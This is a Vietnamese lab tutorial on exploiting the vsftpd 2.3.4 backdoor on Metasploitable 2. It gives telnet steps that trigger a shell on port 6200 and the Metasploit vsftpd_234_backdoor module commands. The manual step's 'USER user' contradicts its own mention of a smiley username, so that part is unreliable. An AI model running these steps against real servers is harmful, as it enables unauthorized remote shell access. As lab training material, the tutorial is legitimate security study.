Hướng dẫn khai thác VSFTPD v2.3.4 trên Metasploitable 2

[NgMSon]

Để khai thác VSFTPD chúng ta có 2 cách như sau:

• Khai thác bằng tay
• Khai thác trên Metasloit

I. Khai thác bằng tay

Ở đây chúng ta sẽ khai thác lỗ hổng backdoor theo cách thủ công bằng cách kết nối với dịch vụ VSFTPD Metasploitable 2 và sử dụng một hình ảnh cười như tên người dùng để xác thực.

Sử dụng lệnh :

telnet [Metasploitable IP] 21

( Trong đó Metasploit IP : IP / 21 : port - giữ nguyên )

Sau khi nhập xong chúng ta tiếp tục với 2 câu lệnh

USER user

PASS pass

* Chờ vài giây

Khi chúng ta kích hoạt nmap và quét cổng 6200, chúng ta sẽ thấy mã độc hại đã được thực hiện

​

Tiếp đó chúng ta kết nối với cổng 6200 bằng cách sử dụng lệnh sau:

telnet [Metasploitable IP] 6200

Video hướng dẫn.

II. Khai thác trên Metasploit

Đâu tiên chúng ta mở msfconsole bằng lệnh sau:

Msfconsole

Khi msfconsole đang chạy chọn khai thác backdoor bằng cách sử dụng lệnh sau:

use exploit/unix/ftp/vsftpd_234_backdoor

Gõ lệnh sau để xem tùy chọn khai thác....

Show options

Như vậy chúng ta có thể thấy chúng ta chỉ cần cung cấp một IP host từ xa và một cổng mà chúng ta để mặc định trên cổng 21. Bây giờ chúng ta có thể gõ chạy hoặc khai thác để khai thác các mục tiêu.

Video demo

 

Video list về Kĩ thuật Hacking >>>
https://www.youtube.com/playlist?list=PLNYeTLZxb7emon3iK6-A9TtvbxzUsKGN4

 

Thanh you very much!

 

Thanh you very much!

Mình sẽ còn đăng thêm nhiều bài viết nữa mong bạn quan tâm.